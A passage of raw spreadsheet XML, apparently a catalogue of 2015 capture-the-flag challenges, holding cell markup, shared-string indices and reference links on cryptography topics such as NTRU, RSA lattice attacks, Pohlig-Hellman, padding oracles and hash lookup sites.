      <c r="F163" s="123" t="s">
        <v>682</v>
      </c>
      <c r="H163" s="125"/>
      <c r="I163" s="125"/>
      <c r="J163" s="121"/>
      <c r="K163" s="121"/>
      <c r="L163" s="121"/>
      <c r="M163" s="121"/>
      <c r="N163" s="121"/>
      <c r="O163" s="121"/>
      <c r="P163" s="121"/>
      <c r="Q163" s="121"/>
      <c r="R163" s="121"/>
      <c r="S163" s="121"/>
      <c r="T163" s="121"/>
      <c r="U163" s="121"/>
      <c r="V163" s="121"/>
      <c r="W163" s="121"/>
      <c r="X163" s="121"/>
      <c r="Y163" s="121"/>
      <c r="Z163" s="121"/>
    </row>
    <row r="164">
      <c r="A164" s="17">
        <v>42552.0</v>
      </c>
      <c r="B164" s="65"/>
      <c r="C164" s="65"/>
      <c r="D164" s="65"/>
      <c r="E164" s="9"/>
      <c r="F164" s="65"/>
      <c r="G164" s="65"/>
      <c r="H164" s="66"/>
      <c r="I164" s="9"/>
      <c r="J164" s="9"/>
      <c r="K164" s="9"/>
      <c r="L164" s="9"/>
      <c r="M164" s="9"/>
      <c r="N164" s="9"/>
      <c r="O164" s="9"/>
      <c r="P164" s="9"/>
      <c r="Q164" s="9"/>
      <c r="R164" s="9"/>
      <c r="S164" s="9"/>
      <c r="T164" s="9"/>
      <c r="U164" s="9"/>
      <c r="V164" s="9"/>
      <c r="W164" s="9"/>
      <c r="X164" s="9"/>
      <c r="Y164" s="9"/>
      <c r="Z164" s="9"/>
    </row>
    <row r="165">
      <c r="A165" s="5" t="s">
        <v>348</v>
      </c>
      <c r="B165" s="43">
        <v>2015.0</v>
      </c>
      <c r="C165" s="5" t="s">
        <v>1699</v>
      </c>
      <c r="D165" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E165" s="5" t="s">
        <v>1308</v>
      </c>
      <c r="F165" s="5" t="s">
        <v>1700</v>
      </c>
      <c r="G165" s="5" t="s">
        <v>1701</v>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="s">
        <v>348</v>
      </c>
      <c r="B166" s="43">
        <v>2015.0</v>
      </c>
      <c r="C166" s="5" t="s">
        <v>1703</v>
      </c>
      <c r="D166" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E166" s="5" t="s">
        <v>1055</v>
      </c>
      <c r="F166" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G166" s="3"/>
    </row>
    <row r="167">
      <c r="A167" s="5" t="s">
        <v>348</v>
      </c>
      <c r="B167" s="43">
        <v>2015.0</v>
      </c>
      <c r="C167" s="5" t="s">
        <v>1707</v>
      </c>
      <c r="D167" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E167" s="44" t="s">
        <v>1653</v>
      </c>
      <c r="F167" s="5" t="s">
        <v>1708</v>
      </c>
      <c r="G167" s="5" t="s">
        <v>1655</v>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="40" t="s">
        <v>1709</v>
      </c>
      <c r="B168" s="40">
        <v>2015.0</v>
      </c>
      <c r="C168" s="40" t="s">
        <v>1710</v>
      </c>
      <c r="D168" s="40" t="s">
        <v>23</v>
      </c>
      <c r="E168" s="40" t="s">
        <v>1711</v>
      </c>
      <c r="F168" s="40" t="s">
        <v>1712</v>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="40" t="s">
        <v>1709</v>
      </c>
      <c r="B169" s="40">
        <v>2015.0</v>
      </c>
      <c r="C169" s="40" t="s">
        <v>1714</v>
      </c>
      <c r="D169" s="40" t="s">
        <v>48</v>
      </c>
      <c r="E169" s="50" t="s">
        <v>1717</v>
      </c>
      <c r="F169" s="40" t="s">
        <v>1718</v>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="40" t="s">
        <v>1719</v>
      </c>
      <c r="B170" s="40">
        <v>2015.0</v>
      </c>
      <c r="C170" s="40" t="s">
        <v>1720</v>
      </c>
      <c r="D170" s="40" t="s">
        <v>23</v>
      </c>
      <c r="E170" s="40" t="s">
        <v>1721</v>
      </c>
      <c r="F170" s="40" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="40" t="s">
        <v>1719</v>
      </c>
      <c r="B171" s="40">
        <v>2015.0</v>
      </c>
      <c r="C171" s="40" t="s">
        <v>1722</v>
      </c>
      <c r="D171" s="40" t="s">
        <v>48</v>
      </c>
      <c r="E171" s="40" t="s">
        <v>1725</v>
      </c>
      <c r="F171" s="40" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="30" t="s">
        <v>1132</v>
      </c>
      <c r="B172" s="31">
        <v>2015.0</v>
      </c>
      <c r="C172" s="30" t="s">
        <v>1143</v>
      </c>
      <c r="D172" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E172" s="30" t="s">
        <v>924</v>
      </c>
      <c r="F172" s="30" t="s">
        <v>1727</v>
      </c>
      <c r="G172" s="30" t="s">
        <v>1728</v>
      </c>
      <c r="H172" s="30"/>
    </row>
    <row r="173">
      <c r="A173" s="30" t="s">
        <v>1132</v>
      </c>
      <c r="B173" s="31">
        <v>2015.0</v>
      </c>
      <c r="C173" s="30" t="s">
        <v>1147</v>
      </c>
      <c r="D173" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E173" s="30" t="s">
        <v>1730</v>
      </c>
      <c r="F173" s="30" t="s">
        <v>1732</v>
      </c>
      <c r="G173" s="35" t="s">
        <v>1139</v>
      </c>
      <c r="H173" s="30"/>
      <c r="I173" s="30"/>
    </row>
    <row r="174">
      <c r="A174" s="30" t="s">
        <v>1132</v>
      </c>
      <c r="B174" s="31">
        <v>2015.0</v>
      </c>
      <c r="C174" s="30" t="s">
        <v>1149</v>
      </c>
      <c r="D174" s="30" t="s">
        <v>1486</v>
      </c>
      <c r="E174" s="30" t="s">
        <v>1538</v>
      </c>
      <c r="F174" s="30" t="s">
        <v>1734</v>
      </c>
      <c r="G174" s="35" t="s">
        <v>1139</v>
      </c>
      <c r="H174" s="30"/>
      <c r="I174" s="30"/>
    </row>
    <row r="175">
      <c r="A175" s="30" t="s">
        <v>1132</v>
      </c>
      <c r="B175" s="31">
        <v>2015.0</v>
      </c>
      <c r="C175" s="30" t="s">
        <v>1735</v>
      </c>
      <c r="D175" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E175" s="30" t="s">
        <v>1736</v>
      </c>
      <c r="F175" s="30" t="s">
        <v>1738</v>
      </c>
      <c r="G175" s="35" t="s">
        <v>1139</v>
      </c>
      <c r="H175" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="I175" s="30"/>
    </row>
    <row r="176">
      <c r="A176" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B176" s="43">
        <v>2015.0</v>
      </c>
      <c r="C176" s="5" t="s">
        <v>1741</v>
      </c>
      <c r="D176" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E176" s="5" t="s">
        <v>1742</v>
      </c>
      <c r="F176" s="5" t="s">
        <v>1650</v>
      </c>
      <c r="G176" s="56" t="s">
        <v>1743</v>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B177" s="43">
        <v>2015.0</v>
      </c>
      <c r="C177" s="5" t="s">
        <v>1750</v>
      </c>
      <c r="D177" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E177" s="5" t="s">
        <v>1752</v>
      </c>
      <c r="F177" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G177" s="3"/>
    </row>
    <row r="178">
      <c r="A178" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B178" s="43">
        <v>2015.0</v>
      </c>
      <c r="C178" s="5" t="s">
        <v>1753</v>
      </c>
      <c r="D178" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E178" s="5" t="s">
        <v>1754</v>
      </c>
      <c r="F178" s="5" t="s">
        <v>1755</v>
      </c>
      <c r="G178" s="56" t="s">
        <v>1756</v>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B179" s="43">
        <v>2015.0</v>
      </c>
      <c r="C179" s="5" t="s">
        <v>1760</v>
      </c>
      <c r="D179" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E179" s="5" t="s">
        <v>1761</v>
      </c>
      <c r="F179" s="5" t="s">
        <v>1762</v>
      </c>
      <c r="G179" s="3"/>
    </row>
    <row r="180">
      <c r="A180" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B180" s="31">
        <v>2015.0</v>
      </c>
      <c r="C180" s="30" t="s">
        <v>1763</v>
      </c>
      <c r="D180" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E180" s="30" t="s">
        <v>1767</v>
      </c>
      <c r="F180" s="30" t="s">
        <v>1768</v>
      </c>
      <c r="G180" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="H180" s="30"/>
      <c r="I180" s="30"/>
    </row>
    <row r="181">
      <c r="A181" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B181" s="31">
        <v>2015.0</v>
      </c>
      <c r="C181" s="30" t="s">
        <v>1769</v>
      </c>
      <c r="D181" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E181" s="30" t="s">
        <v>924</v>
      </c>
      <c r="F181" s="30" t="s">
        <v>1770</v>
      </c>
      <c r="G181" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="H181" s="30"/>
      <c r="I181" s="30"/>
    </row>
    <row r="182">
      <c r="A182" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B182" s="31">
        <v>2015.0</v>
      </c>
      <c r="C182" s="30" t="s">
        <v>1771</v>
      </c>
      <c r="D182" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E182" s="30" t="s">
        <v>1772</v>
      </c>
      <c r="F182" s="30" t="s">
        <v>1773</v>
      </c>
      <c r="G182" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/NTRUEncrypt"," NTRUEncrypt")</f>
        <v> NTRUEncrypt</v>
      </c>
      <c r="H182" s="33" t="str">
        <f>HYPERLINK("http://people.scs.carleton.ca/~maheshwa/courses/4109/Seminar11/NTRU_presentation.pdf","NTRU Cryptosystem Analysis")</f>
        <v>NTRU Cryptosystem Analysis</v>
      </c>
      <c r="I182" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Shor%27s_algorithm","Shor's Algorithm")</f>
        <v>Shor's Algorithm</v>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B183" s="31">
        <v>2015.0</v>
      </c>
      <c r="C183" s="30" t="s">
        <v>1779</v>
      </c>
      <c r="D183" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E183" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Goldwasser%E2%80%93Micali_cryptosystem","Goldwasser-Micali ")</f>
        <v>Goldwasser-Micali </v>
      </c>
      <c r="F183" s="130" t="s">
        <v>1783</v>
      </c>
      <c r="G183" s="33" t="str">
        <f>HYPERLINK("https://sourceforge.net/projects/msieve/","Msieve Factorization Library")</f>
        <v>Msieve Factorization Library</v>
      </c>
      <c r="H183" s="30"/>
      <c r="I183" s="30"/>
    </row>
    <row r="184">
      <c r="A184" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B184" s="31">
        <v>2015.0</v>
      </c>
      <c r="C184" s="30" t="s">
        <v>1794</v>
      </c>
      <c r="D184" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E184" s="30" t="s">
        <v>1795</v>
      </c>
      <c r="F184" s="30" t="s">
        <v>1796</v>
      </c>
      <c r="G184" s="30"/>
      <c r="H184" s="30"/>
    </row>
    <row r="185">
      <c r="A185" s="30" t="s">
        <v>1797</v>
      </c>
      <c r="B185" s="31">
        <v>2015.0</v>
      </c>
      <c r="C185" s="30" t="s">
        <v>1798</v>
      </c>
      <c r="D185" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E185" s="30" t="s">
        <v>924</v>
      </c>
      <c r="F185" s="30" t="s">
        <v>1799</v>
      </c>
      <c r="G185" s="132" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Emirp","What is an Emirp")</f>
        <v>What is an Emirp</v>
      </c>
      <c r="H185" s="30"/>
      <c r="I185" s="30"/>
    </row>
    <row r="186">
      <c r="A186" s="30" t="s">
        <v>1797</v>
      </c>
      <c r="B186" s="31">
        <v>2016.0</v>
      </c>
      <c r="C186" s="30" t="s">
        <v>1807</v>
      </c>
      <c r="D186" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E186" s="30" t="s">
        <v>924</v>
      </c>
      <c r="F186" s="34" t="s">
        <v>1810</v>
      </c>
      <c r="G186" s="33" t="str">
        <f>HYPERLINK("https://github.com/mimoo/RSA-and-LLL-attacks","RSA and LLL Attacks")</f>
        <v>RSA and LLL Attacks</v>
      </c>
      <c r="H186" s="30"/>
      <c r="I186" s="30"/>
    </row>
    <row r="187">
      <c r="A187" s="34" t="s">
        <v>1797</v>
      </c>
      <c r="B187" s="134">
        <v>2015.0</v>
      </c>
      <c r="C187" s="34" t="s">
        <v>1822</v>
      </c>
      <c r="D187" s="34" t="s">
        <v>128</v>
      </c>
      <c r="E187" s="34" t="s">
        <v>1825</v>
      </c>
      <c r="F187" s="34" t="s">
        <v>1826</v>
      </c>
      <c r="G187" s="135" t="str">
        <f>HYPERLINK("http://www.case.edu/artsci/math/singer/Sage/pohligHellman.shtml","Pohlig-Hellman Algorithm")</f>
        <v>Pohlig-Hellman Algorithm</v>
      </c>
      <c r="H187" s="135" t="str">
        <f>HYPERLINK("https://www.ietf.org/rfc/rfc5246.txt","TLSv1.2 RFC")</f>
        <v>TLSv1.2 RFC</v>
      </c>
      <c r="I187" s="135" t="str">
        <f>HYPERLINK("https://www.adayinthelifeof.nl/2013/12/30/decoding-tls-with-php/","Decode TLS with PHP")</f>
        <v>Decode TLS with PHP</v>
      </c>
      <c r="J187" s="135" t="str">
        <f>HYPERLINK("http://aes.online-domain-tools.com/","AES Domain Tools")</f>
        <v>AES Domain Tools</v>
      </c>
      <c r="K187" s="105"/>
      <c r="L187" s="105"/>
      <c r="M187" s="105"/>
      <c r="N187" s="105"/>
      <c r="O187" s="105"/>
      <c r="P187" s="105"/>
      <c r="Q187" s="105"/>
      <c r="R187" s="105"/>
      <c r="S187" s="105"/>
      <c r="T187" s="105"/>
      <c r="U187" s="105"/>
      <c r="V187" s="105"/>
      <c r="W187" s="105"/>
      <c r="X187" s="105"/>
      <c r="Y187" s="105"/>
      <c r="Z187" s="105"/>
    </row>
    <row r="188">
      <c r="A188" s="30" t="s">
        <v>1797</v>
      </c>
      <c r="B188" s="31">
        <v>2015.0</v>
      </c>
      <c r="C188" s="30" t="s">
        <v>1837</v>
      </c>
      <c r="D188" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E188" s="30" t="s">
        <v>1630</v>
      </c>
      <c r="F188" s="30" t="s">
        <v>1838</v>
      </c>
      <c r="G188" s="30"/>
      <c r="H188" s="30"/>
      <c r="I188" s="30"/>
      <c r="J188" s="30"/>
    </row>
    <row r="189">
      <c r="A189" s="40" t="s">
        <v>167</v>
      </c>
      <c r="B189" s="40">
        <v>2015.0</v>
      </c>
      <c r="C189" s="52" t="s">
        <v>1839</v>
      </c>
      <c r="D189" s="40" t="s">
        <v>23</v>
      </c>
      <c r="E189" s="40" t="s">
        <v>1840</v>
      </c>
      <c r="F189" s="51" t="s">
        <v>1841</v>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="17">
        <v>42570.0</v>
      </c>
      <c r="B190" s="65"/>
      <c r="C190" s="65"/>
      <c r="D190" s="65"/>
      <c r="E190" s="9"/>
      <c r="F190" s="65"/>
      <c r="G190" s="65"/>
      <c r="H190" s="66"/>
      <c r="I190" s="9"/>
      <c r="J190" s="9"/>
      <c r="K190" s="9"/>
      <c r="L190" s="9"/>
      <c r="M190" s="9"/>
      <c r="N190" s="9"/>
      <c r="O190" s="9"/>
      <c r="P190" s="9"/>
      <c r="Q190" s="9"/>
      <c r="R190" s="9"/>
      <c r="S190" s="9"/>
      <c r="T190" s="9"/>
      <c r="U190" s="9"/>
      <c r="V190" s="9"/>
      <c r="W190" s="9"/>
      <c r="X190" s="9"/>
      <c r="Y190" s="9"/>
      <c r="Z190" s="9"/>
    </row>
    <row r="191">
      <c r="A191" s="30" t="s">
        <v>1216</v>
      </c>
      <c r="B191" s="31">
        <v>2015.0</v>
      </c>
      <c r="C191" s="30" t="s">
        <v>1842</v>
      </c>
      <c r="D191" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E191" s="30" t="s">
        <v>1843</v>
      </c>
      <c r="F191" s="30" t="s">
        <v>1844</v>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B192" s="31">
        <v>2015.0</v>
      </c>
      <c r="C192" s="30" t="s">
        <v>1845</v>
      </c>
      <c r="D192" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E192" s="30" t="s">
        <v>1570</v>
      </c>
      <c r="F192" s="30" t="s">
        <v>1846</v>
      </c>
      <c r="G192" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="H192" s="30"/>
    </row>
    <row r="193">
      <c r="A193" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B193" s="31">
        <v>2015.0</v>
      </c>
      <c r="C193" s="30" t="s">
        <v>1847</v>
      </c>
      <c r="D193" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E193" s="30" t="s">
        <v>1088</v>
      </c>
      <c r="F193" s="30" t="s">
        <v>1848</v>
      </c>
      <c r="G193" s="33" t="str">
        <f>HYPERLINK("http://quipqiup.com/index.php","quipquip")</f>
        <v>quipquip</v>
      </c>
      <c r="H193" s="30"/>
    </row>
    <row r="194">
      <c r="A194" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B194" s="31">
        <v>2015.0</v>
      </c>
      <c r="C194" s="30" t="s">
        <v>1849</v>
      </c>
      <c r="D194" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E194" s="30" t="s">
        <v>1850</v>
      </c>
      <c r="F194" s="33" t="s">
        <v>1851</v>
      </c>
      <c r="G194" s="30"/>
      <c r="H194" s="30"/>
      <c r="I194" s="30"/>
      <c r="J194" s="30"/>
      <c r="K194" s="30"/>
    </row>
    <row r="195">
      <c r="A195" s="30" t="s">
        <v>1852</v>
      </c>
      <c r="B195" s="31">
        <v>2015.0</v>
      </c>
      <c r="C195" s="30" t="s">
        <v>1853</v>
      </c>
      <c r="D195" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E195" s="30" t="s">
        <v>1854</v>
      </c>
      <c r="F195" s="30" t="s">
        <v>1855</v>
      </c>
      <c r="G195" s="33" t="str">
        <f>HYPERLINK("http://www.cgsecurity.org/wiki/TestDisk","Testdisk - Image Recovery")</f>
        <v>Testdisk - Image Recovery</v>
      </c>
      <c r="H195" s="30"/>
    </row>
    <row r="196">
      <c r="A196" s="30" t="s">
        <v>1852</v>
      </c>
      <c r="B196" s="31">
        <v>2015.0</v>
      </c>
      <c r="C196" s="30" t="s">
        <v>1861</v>
      </c>
      <c r="D196" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E196" s="30" t="s">
        <v>1862</v>
      </c>
      <c r="F196" s="33" t="s">
        <v>1864</v>
      </c>
      <c r="G196" s="30"/>
      <c r="H196" s="30"/>
      <c r="I196" s="30"/>
    </row>
    <row r="197">
      <c r="A197" s="30" t="s">
        <v>1300</v>
      </c>
      <c r="B197" s="31">
        <v>2015.0</v>
      </c>
      <c r="C197" s="30" t="s">
        <v>1865</v>
      </c>
      <c r="D197" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E197" s="30" t="s">
        <v>1866</v>
      </c>
      <c r="F197" s="30" t="s">
        <v>1867</v>
      </c>
      <c r="G197" s="33" t="str">
        <f>HYPERLINK("https://hashkiller.co.uk/default.aspx","HashKiller Database")</f>
        <v>HashKiller Database</v>
      </c>
      <c r="H197" s="33" t="str">
        <f>HYPERLINK("https://hashes.org/crackers.php","Hash Database")</f>
        <v>Hash Database</v>
      </c>
      <c r="I197" s="30"/>
    </row>
    <row r="198">
      <c r="A198" s="30" t="s">
        <v>1300</v>
      </c>
      <c r="B198" s="31">
        <v>2015.0</v>
      </c>
      <c r="C198" s="30" t="s">
        <v>1876</v>
      </c>
      <c r="D198" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E198" s="30" t="s">
        <v>1877</v>
      </c>
      <c r="F198" s="30" t="s">
        <v>1879</v>
      </c>
      <c r="G198" s="30" t="s">
        <v>1880</v>
      </c>
      <c r="H198" s="30"/>
      <c r="I198" s="30"/>
    </row>
    <row r="199">
      <c r="A199" s="30" t="s">
        <v>1300</v>
      </c>
      <c r="B199" s="31">
        <v>2015.0</v>
      </c>
      <c r="C199" s="30" t="s">
        <v>1881</v>
      </c>
      <c r="D199" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E199" s="30" t="s">
        <v>1538</v>
      </c>
      <c r="F199" s="30" t="s">
        <v>1882</v>
      </c>
      <c r="G199" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Padding_oracle_attack"," Padding attacks")</f>
        <v> Padding attacks</v>
      </c>
      <c r="H199" s="30"/>
    </row>
    <row r="200">
      <c r="A200" s="5" t="s">
        <v>1884</v>
      </c>
      <c r="B200" s="43">
        <v>2015.0</v>
      </c>
      <c r="C200" s="5" t="s">
        <v>1887</v>
      </c>
      <c r="D200" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E200" s="5" t="s">
        <v>1888</v>
      </c>
      <c r="F200" s="5" t="s">
        <v>1889</v>
      </c>
      <c r="G200" s="56" t="s">
        <v>1890</v>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="s">
        <v>1884</v>
      </c>
      <c r="B201" s="43">
        <v>2015.0</v>
      </c>
      <c r="C201" s="5" t="s">
        <v>1894</v>
      </c>
      <c r="D201" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E201" s="5" t="s">
        <v>716</v>
      </c>
      <c r="F201" s="5" t="s">
        <v>1895</v>
      </c>
      <c r="G201" s="3"/>
    </row>
    <row r="202">
      <c r="A202" s="5" t="s">
        <v>1884</v>
      </c>
      <c r="B202" s="43">
        <v>2015.0</v>
      </c>
      <c r="C202" s="5" t="s">
        <v>1896</v>
      </c>
      <c r="D202" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E202" s="5" t="s">
        <v>1897</v>
      </c>
      <c r="F202" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G202" s="3"/>
    </row>
    <row r="203">
      <c r="A203" s="5" t="s">
        <v>1884</v>
      </c>
      <c r="B203" s="43">
        <v>2015.0</v>
      </c>
      <c r="C203" s="5" t="s">
        <v>1899</v>
      </c>
      <c r="D203" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E203" s="5" t="s">
        <v>1901</v>
      </c>
      <c r="F203" s="5" t="s">
        <v>1902</v>
      </c>
      <c r="G203" s="56" t="s">
        <v>1903</v>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="s">
        <v>1884</v>
      </c>
      <c r="B204" s="43">
        <v>2015.0</v>
      </c>
      <c r="C204" s="5" t="s">
        <v>1906</v>
      </c>
      <c r="D204" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E204" s="5" t="s">
        <v>1908</v>
      </c>
      <c r="F204" s="5" t="s">
        <v>1902</v>
      </c>
      <c r="G204" s="56" t="s">
        <v>1910</v>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="s">
        <v>1884</v>
      </c>
      <c r="B205" s="43">
        <v>2015.0</v>
      </c>
      <c r="C205" s="5" t="s">
        <v>1913</v>
      </c>
      <c r="D205" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E205" s="5" t="s">
        <v>716</v>
      </c>
      <c r="F205" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G205" s="3"/>
    </row>
    <row r="206">
      <c r="A206" s="5" t="s">
        <v>1884</v>
      </c>
      <c r="B206" s="43">
        <v>2015.0</v>
      </c>
      <c r="C206" s="5" t="s">
        <v>1915</v>
      </c>
      <c r="D206" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E206" s="5" t="s">
        <v>766</v>
      </c>
      <c r="F206" s="5" t="s">
        <v>1917</v>
      </c>
      <c r="G206" s="56" t="s">
        <v>1919</v>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B207" s="43">
        <v>2015.0</v>
      </c>
      <c r="C207" s="5" t="s">
        <v>1923</v>
      </c>
      <c r="D207" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E207" s="5" t="s">
        <v>716</v>
      </c>
      <c r="F207" s="5" t="s">
        <v>1925</v>
      </c>
      <c r="G207" s="3"/>
    </row>
    <row r="208">
      <c r="A208" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B208" s="43">
        <v>2015.0</v>
      </c>
      <c r="C208" s="5" t="s">
        <v>1930</v>
      </c>
      <c r="D208" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E208" s="5" t="s">
        <v>1932</v>
      </c>
      <c r="F208" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G208" s="3"/>
    </row>
    <row r="209">
      <c r="A209" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B209" s="43">
        <v>2105.0</v>
      </c>
      <c r="C209" s="5" t="s">
        <v>1934</v>
      </c>
      <c r="D209" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E209" s="3"/>
      <c r="F209" s="5" t="s">
        <v>1936</v>
      </c>
      <c r="G209" s="56" t="s">
        <v>1938</v>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="113" t="s">
        <v>167</v>
      </c>
      <c r="B210" s="115">
        <v>2015.0</v>
      </c>
      <c r="C210" s="113" t="s">
        <v>1942</v>
      </c>
      <c r="D210" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E210" s="113" t="s">
        <v>826</v>
      </c>
      <c r="F210" s="113" t="s">
        <v>1945</v>
      </c>
      <c r="G210" s="30"/>
      <c r="H210" s="30"/>
    </row>
    <row r="211">
      <c r="A211" s="113" t="s">
        <v>167</v>
      </c>
      <c r="B211" s="115">
        <v>2015.0</v>
      </c>
      <c r="C211" s="113" t="s">
        <v>1946</v>
      </c>
      <c r="D211" s="113" t="s">
        <v>23</v>
      </c>
      <c r="E211" s="113" t="s">
        <v>1947</v>
      </c>
      <c r="F211" s="113" t="s">
        <v>1948</v>
      </c>
      <c r="G211" s="30"/>
      <c r="H211" s="30"/>
    </row>
    <row r="212">
      <c r="A212" s="30" t="s">
        <v>167</v>
      </c>
      <c r="B212" s="31">
        <v>2015.0</v>
      </c>
      <c r="C212" s="30" t="s">
        <v>1866</v>
      </c>
      <c r="D212" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E212" s="30"/>
      <c r="F212" s="140" t="s">
        <v>1950</v>
      </c>
      <c r="G212" s="30"/>
      <c r="H212" s="30"/>
    </row>
    <row r="213">
      <c r="A213" s="30" t="s">
        <v>167</v>
      </c>
      <c r="B213" s="31">
        <v>2015.0</v>
      </c>
      <c r="C213" s="30" t="s">
        <v>1959</v>
      </c>
      <c r="D213" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E213" s="30"/>
      <c r="F213" s="140" t="s">
        <v>1950</v>
      </c>
      <c r="G213" s="30"/>
      <c r="H213" s="30"/>
    </row>
    <row r="214">
      <c r="A214" s="30" t="s">
        <v>167</v>
      </c>
      <c r="B214" s="31">
        <v>2015.0</v>
      </c>
      <c r="C214" s="30" t="s">
        <v>1963</v>
      </c>
      <c r="D214" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E214" s="30" t="s">
        <v>1965</v>
      </c>
      <c r="F214" s="30" t="s">
        <v>1966</v>
      </c>
      <c r="G214" s="30"/>
      <c r="H214" s="30"/>
    </row>
    <row r="215">
      <c r="A215" s="30" t="s">
        <v>167</v>
      </c>
      <c r="B215" s="31">
        <v>2015.0</v>
      </c>
      <c r="C215" s="30" t="s">
        <v>1967</v>
      </c>
      <c r="D215" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E215" s="30" t="s">
        <v>1055</v>
      </c>
      <c r="F215" s="30" t="s">
        <v>1968</v>
      </c>
      <c r="G215" s="30"/>
      <c r="H215" s="30"/>
    </row>
    <row r="216">
      <c r="A216" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B216" s="31">
        <v>2015.0</v>
      </c>
      <c r="C216" s="30" t="s">
        <v>1969</v>
      </c>
      <c r="D216" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E216" s="30" t="s">
        <v>1971</v>
      </c>
      <c r="F216" s="30" t="s">
        <v>1971</v>
      </c>
      <c r="G216" s="30"/>
      <c r="H216" s="30"/>
    </row>
    <row r="217">
      <c r="A217" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B217" s="31">
        <v>2015.0</v>
      </c>
      <c r="C217" s="30" t="s">
        <v>1974</v>
      </c>
      <c r="D217" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E217" s="30" t="s">
        <v>1975</v>
      </c>
      <c r="F217" s="30" t="s">
        <v>1976</v>
      </c>
      <c r="G217" s="30"/>
      <c r="H217" s="30"/>
    </row>
    <row r="218">
      <c r="A218" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B218" s="31">
        <v>2015.0</v>
      </c>
      <c r="C218" s="30" t="s">
        <v>1977</v>
      </c>
      <c r="D218" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E218" s="30" t="s">
        <v>826</v>
      </c>
      <c r="F218" s="30" t="s">
        <v>1978</v>
      </c>
      <c r="G218" s="30"/>
      <c r="H218" s="30"/>
    </row>
    <row r="219">
